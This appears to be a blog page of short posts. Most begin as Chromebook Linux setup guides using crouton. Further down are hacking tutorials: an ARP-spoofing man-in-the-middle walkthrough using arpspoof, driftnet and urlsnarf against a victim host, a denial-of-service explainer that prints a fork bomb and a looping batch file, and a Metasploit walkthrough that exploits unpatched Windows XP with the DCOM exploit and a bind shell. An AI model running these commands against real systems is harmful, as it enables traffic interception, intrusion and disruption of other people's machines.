How to Install Debian on chromebook with crouton

What is Debian Linux and why do I want it on my Chromebook!

Debian on Chromebook

Debian is a Linux distribution comprised of open source software that is the bases of a large variety of Linux distribution. Kali, Ubuntu & Mint are a few examples of linux distors built on-top of Debian. Debian is also widely accepted as the solid linux.

How do I install it?

To install Debian on Chromebook you must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sh ~/Downloads/crouton -r debian -t kde -n debian

-r is the release. We need to set this to debian. If the -r switch is not passed Ubuntu will be installed.

-t is the target command that specifies what GUI interface you want installed by default. Gnome is the default gui for kali however it does not work on my HP Chromebook 14″. KDE works and is a  good alternative to Gnome.

-n is the name parameter. We define the -n switch here so we can give the chroot a custom name of debian.

As of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install debian on the system.

at some point you will be prompted for a user name and password.

How do I start Debian on chromebook?

Once the install is complete from the shell type sudo startdebian. (This is also known as chroot)

this will start the Debian instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startdebian again.

it is possible to install multiple chroots.

Want to know more?

Read more

by Malik korrich ~ dimanche 29 mars 2015 0 commentaires

Turn Chromebook on Developer Mode

How do I turn on developer mode on a Chromebook?
Warning: Entering developer mode will wipe all data off of the SSD.

on a HP Chromebook  14″ With the machine booted Press ESC+REFRESH BUTTON + POWER at the same time.



The chromebook will reboot and you will be met with a message stating “ChromeOS is missing or not found”. Press CTL+D on the keyboard to skip this message. You will then be prompted by another message stating “To turn OS Verification off press enter”. Press ENTER. Your chromebook will then reboot, and prompt with a screen stating “OS Verification is off”. Press CTL+D to skip this message. You will then be prompted with a message “Your system is transitioning into developer mode. Local data has been cleared. Modifications you make to the system are not supported by Google, may cause hardware damage and may void your warranty. To cancel, turn your computer off now”. A timer is set in the top left hand corner of the screen to 30 seconds. Wait for the timer to reach 0. Once the timer has reached 0 you will be prompted with a new message “Preparing system for developer mode. This may take awhile. Do not turn your computer off until it restarts”. Wait for this process to complete; Once the process has complete the chromebook will reboot and you will be met with the message again “OS Verification is off”. Press CTL+D to skip this screen and boot the machine.

Chromebook OS Verification

Note: If you wish to restore your chromebook back to factory and re-wipe your data, reboot your chromebook and press space bar when the following message appears “OS Verification is off. Press space to re-enable”. Pressing space bar will reset your chromebook back to factory with OS verification back on.

Once the chromebook is in developer mode you will be able to take full advantage of the shell command. The shell command is access from the crosh terminal window.

To access the crosh terminal windows press CTLR+ALT+T on your keyboard.

Once open type shell and press enter. This puts you into a shell capable of some basic linux commands. This mode is also used for loading linux with the crouton script.

Read more

by Malik korrich ~ 0 commentaires

Install Ubuntu on a Chromebook

What is Ubuntu and why do I want it on my Chromebook!

Ubuntu is a linux distribution that is widely accepted as the most commonly installed linux distro. It is used as a alternative, althought not a direct replacement, for windows or Mac. Ubuntu extends the functionality of the chromebook, making the chromebook viable for developers, hackers, techies, and the common user.

Why not just install windows?

The underlying architecture from chrome os is strongly based on linux and Ubuntu. Although Im sure it is possible to install windows on a chromebook you would have the dual boot/chrooted awesomeness of both chromeOS and Ubuntu.

How do I install Ubuntu on a Chromebook?

To install Ubuntu on a chromebook it must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sh ~/Downloads/crouton -t unity

12.04 ubuntu is installed by default. You can switch the release of ubuntu by using the -r command.

-t is the target command that specifies what GUI interface you want installed by default. Unity is recommended by me out of the box for Ubuntu for two reasons.

 it works

 it is the default GUI installed when doing a fresh install of Ubuntu.

as of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install ubuntu on the system.

at some point you will be prompted for a user name and password.

How do I start Ubuntu on a Chromebook?

Once the install is complete from the shell type sudo startunity. (This is also known as chroot)

this will start the unity instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startunity again.

Read more

by Malik korrich ~ 0 commentaires

How to install Kali Linux on HP Chromebook 14

Kali Linux
What is Kali Linux and why do I want it on my Chromebook!

Kali is a Linux distribution that is widely accepted as the Linux distribution for penetration testers, security experts and hackers. It is the successor to Backtrack Linux. Kali allows the user to install packages such as aircrack-ng and reaver to collect data on and hack into wireless networks.

How Do I Install Kali Linux on a Chromebook?
To install Kali on a Chromebook with crouton, the Chromebook must be in developer mode. please reference the following page to learn how to enter  developer mode.

Once in developer mode you need to download a special forked version of crouton. Kali has not yet been pulled into the master crouton project on github.

UPDATE: Kali has been added into the main crouton tree. You can download it here crouton.

Open the crosh terminal (CTLR+ALT+T).

enter shell mode by typing shell / enter.

from shell type sudo sh ~/Downloads/crouton -r kali -t kde -n kali

-r is the release. We need to set this to Kali. If the -r switch is not passed Ubuntu will be installed.

-t is the target command that specifies what GUI interface you want installed by default. Gnome is the default unity for kali however it does not work on my HP Chromebook 14″. KDE works and is a  good alternative to Gnome.

-n is the name parameter. We define the -n switch here so we can give the chroot a custom name of kali.

As of this article I do not recommend gnome for the target gui on the HP Chromebook 14.

The process will run and install kali on the system.

at some point you will be prompted for a user name and password.

How Do I Run Kali Linux on a Chromebook?
Once the install is complete from the shell type sudo startkde.

this will start the Kali instance.

To transition seamlessly from chromeos and unity press CTRL+ALT+<=(backward) for chromeos and CTRL+ALT+=>(forward).

if the machine is rebooted you will have to enter shell and type sudo startkde again.

Endless Possibilities:
it is possible to install multiple chroots.

Read more

by Malik korrich ~ 0 commentaires

Kali Linux Man in the Middle Attack- Kali Linux Tutorial

Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the middle attack using Kali Linux?we will learn the step by step process how to do this.

I believe most of you already know and learn about the concept what is man in the middle attack, but if you still don't know about this, here is some definition from wikipedia.

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

Scenario:

This is the simple scenario, and I try to draw it in a picture.

Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

Requirements:

1. Arpspoof

2. Driftnet

3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between "real router" and the victim. Read the tutorial here how to set up packet forwarding in linux.

2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window.

3. The next step is setting up arpspoof between victim and router.

arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. And then setting up arpspoof from to capture all packet from router to victim.

arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.

6. Now we can try to use driftnet to monitor all victim image traffic. According to its website,

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

7. To run driftnet, we just run this

driftnet -i eth0

When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code

urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.

9. When victim browse a website, attacker will know the address victim visited.

Here is the video in case you can't get the text explanations above.

Conclusion:

1. To change or spoof the attacker MAC address, you can view the tutorial about how to change kali linux MAC address.

2. Driftnet or Urlsnarf was hard to detect, but you can try to find the device in your network with promiscious mode which have possibliity to sniff the network traffic.

Hope you found it useful 

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.p8piGoyv.dpuf

Read more

by Malik korrich ~ samedi 30 août 2014 0 commentaires

Denial of Service Attack : EXPLAINED FOR BEGINNERS AND DUMMIES

Just like most other things associated with hacking, a denial of service attack is not everyone's cup of tea. It, however, can be understood if explained properly. In this tutorial, I'll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We'll start at the easiest point.

What effect does a denial of service attack have

Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource from the right to use it. I mean if I successfully perform a DOS on your machine, you won't be able to use it anymore. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance - a name worth mentioning here is Anonymous) do a Distributed Denial of service attack on government and private websites to make them listen to the people's opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hactivists had to suffer jailtime for participating in DDOS). So basically it's just what its name suggests, Denial Of Service.

Basic Concept

It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. Most of us use the words like "This website was down the other day" without any idea what it actually means. Well now you do. To give you a good idea of what is happening, I'll take the example from the movie "We Are Legion".

Scenario One : Multiplayer online game

Now consider you are playing an online multi-player game. There are millions of other people who also play this game. Now there's a pool in the game that everyone likes to visit. Now you and your friends know that they have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block the access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. This is the kind of thing that gives you a very basic idea what a denial of service attack can be.

They made a Swastika and blocked access to the pool

Scenario 2 : Bus stop

Now assume that due to some reason, you want to disrupt the bus service of your city and stop the people from using the service. To stop the legitimate people from utilizing this service, you can call your friends to unnecessarily use it. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible since you don't have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another.

So while this may seem impossible in the real world, in the virtual world, you can cause as much load as a thousand (or even a million) users alone at the click of a button. There are many tools out there for this purpose, however, you are not recommended to use them as a DOS on someone else is illegal, and easy to detect (Knock, knock. It's the police). We will, come back to this later, and do a DOS on our own computer.

How denial of service attacks are carried out

Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Basically, it take more than just one packet, you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, for which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So, companies buy server that can provide enough data transfer for its regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it under DOS, it just turns off the server, so that it does not have to waste its monetary resources on a DOS, and wait till the DOS stops. Now with the modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time, the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server. It's just like you go to a page, and start refreshing it very fast, maybe a thousand times every second. And you are not the only one. There are thousand others that are doing the same thing. So basically you guys are equivalent to more than a million users using the site simultaneously, and that's not something the server can take. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it's not just the websites that get better, and the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides ( the good, the bad and the ugly). 

A Live DOS on your Kali Machine

If you have Kali linux (The hackers OS- the OS of choice if you use this blog) the here's a small exercise for you. 

We are going to execute a command in the Kali linux terminal that will cripple the operating system and make it hand. It will most probably work on other linux distributions too.

Warning : This code will freeze Kali linux, and most probably it will not recover from the shock. You'll lose any unsaved data. You will have to restart the machine the hard way (turn of the virtual machine directly or cut the power supply if its a real machine). Just copy paste the code and your computer is gone.

:(){ :|:& };:

The machine froze right after I pressed enter. I had to power it off from the Vmware interface.

What basically happened is that the one line command asked the operating system to keep opening process very fast for an infinite period of time. It just gave up.

Here's something for the Windows Users

Crashing Windows Using Batch file

Open a notepad. Put the following code in it-

:1
Start
goto 1

Save the file as name.bat

Bat here is batch file extension. Run it. Game over.

It basically executes the second line, and the third line makes it go over to the first, execute the second, and then over to first again, execute the second..... infinitely. So again, denial of service. All the processing power is used by a useless command, while you, the legitimate user, can't do anything.

That's it for this tutorial, we'll discuss the technical details of a practical denial of service in a later tutorial.

Read more

by Malik korrich ~ jeudi 7 août 2014 0 commentaires

PENETRATION TESTING - HACKING XP With KALI Linux Tutorial

Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing. But we aren't going to ideal way. I'm gonna teach you penetration testing the way I learnt it. By doing actual penetration and exploitation. We can't hack completely patched Windows 7 or Windows 8 right in the first tutorial, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need to victim machine. Testing this method on someone else's computer is not recommended and is highly illegal. It is strongly advised to create your own virtual machine and test exploits there.

What are you going to need

Knowledge

• Basic Penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation here in this tutorial)
• The tough manual way of penetration testing (A large patch of advanced material which will help you become a great pentester if you have the patience to read it all and capability to understand it)
• VMWare tools (Without Vmware tools there is no way you can have a Kali linux (attacker machine) and unpatched XP (target machine) running at the same time in one single computer)

Virtual Machines

• Kali linux ( Click the link for a complete detailed guide)
• Windows XP (After you've followed the tutorial above for installing Kali linux, installing XP on a VM will be a piece of cake, a few screenshots of the process)

Now there is catch in Windows XP. While Kali linux is free, Windows XP is not. So you have to buy one. I'm dead against piracy, and won't promote anything of that kind on my blog. Just make sure that when you are buying a Windows XP cd, it is unpatched and SP1. If it is patched then the exploits won't work. Your best bet would be to look up your shelves to find an old XP cd that you bought years ago which is catching dust, and put it to some use.

A look at Metasploit Framework

Starting the framework

"In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here's some commands you need to execute on your console before you can start metasploit

service postgresql start

(Metasploit uses PostgreSQL as its database so it needs to be launched first.)

With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.

service metasploit start

Now finally we are ready to start metasploit framework.

msfconsole

Looking at the targets

Right now, my metasploit framework is running on Kali on Vmware on a Windows 8 machine. Also, there is a Windows XP Sp3 virtual machine running side my side with my Kali. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan.

Port Scan

Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan

To use this feature, enter the following code-

use auxiliary/scanner/portscan/tcp

Type show options to see the available options

show options

 Now we have to change a few settings, firstly, we should reduce the number of ports scanned

 set ports 1-500

Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type

ipconfig

In the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as.

In my case the IP is 192.168.63.131

Now go back to your Kali machine, and type the fol (change the IP as required)

set RHOST 192.168.63.131

Here's what it should look like

There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.

Now we are ready for some action, do a show options again to see what all changes you've made. Finally, type-

run

The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.
If you had not been using an unpatched version of Windows, there will not be any vulnerable ports.

This basically means that there are no open ports here. Nothing much you can do. However if you had some good luck there, and had a vulnerable machine, you will have some vulnerable ports. In my case, I turned off the firewall on the windows machine and run the auxiliary module again. 

I got 3 open ports this time. If you are using some higher XP version, you too might need to disable firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open.

Real life port scan

In actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. In such cases, we can use Nmap port scanner which is much better than auxiliary. We'll come to that later.

Finding Exploits

This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole.

search dcom

This is a very famous exploit for Windows.

Copy the exploit number 3. (Which shows great as rank). In the next line, type

use exploit/windows/dcerpc/ms03_026_dcom

You are now using the most famous Windows exploit. Type show options again

show options

Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)

set RHOST 192.168.63.131 

Also, set a payload.

set PAYLOAD windows/shell_bind_tcp

And here's the best part

exploit

You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload.
We have a pentesting lab now and have successfully exploited an XP machine.

Read more

by Malik korrich ~ 0 commentaires

Hack Router Password Hack Using Medusa Kali linux Tutuorial

Heloo Guys In tis tutuorial i will show you how to hack router passwords with kali linux                                                                                     

 

Read more

by Malik korrich ~ lundi 26 mai 2014 0 commentaires